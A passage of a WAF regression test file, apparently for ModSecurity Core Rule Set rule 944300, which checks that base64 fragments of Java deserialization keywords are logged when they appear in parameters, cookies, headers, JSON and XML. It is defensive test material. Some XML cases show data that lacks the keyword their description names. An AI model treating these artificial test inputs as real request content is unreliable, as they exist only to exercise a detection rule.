"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-108 - desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-109 - desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-110 - desc: "Argument test includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-111 - desc: "Argument name includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-112 - desc: "Cookie test includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GZvcmNsb3N1cmU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-113 - desc: "Cookie name includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GZvcmNsb3N1cmU=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-114 - desc: "Request header test includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GZvcmNsb3N1cmU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-115 - desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-116 - desc: "XML element value includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-117 - desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-118 - desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-119 - desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"GZvcmNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-120 - desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"GZvcmNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-121 - desc: "Argument test includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-122 - desc: "Argument name includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-123 - desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bmb3JjbG9zdXJl - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-124 - desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bmb3JjbG9zdXJl=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-125 - desc: "Request header test includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bmb3JjbG9zdXJl - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-126 - desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-127 - desc: "XML element value includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-128 - desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-129 - desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-130 - desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-131 - desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-132 - desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-133 - desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-134 - desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-135 - desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-136 - desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-137 - desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-138 - desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-139 - desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-140 - desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-141 - desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-142 - desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-143 - desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-144 - desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-145 - desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-146 - desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-147 - desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-148 - desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-149 - desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-150 - desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: 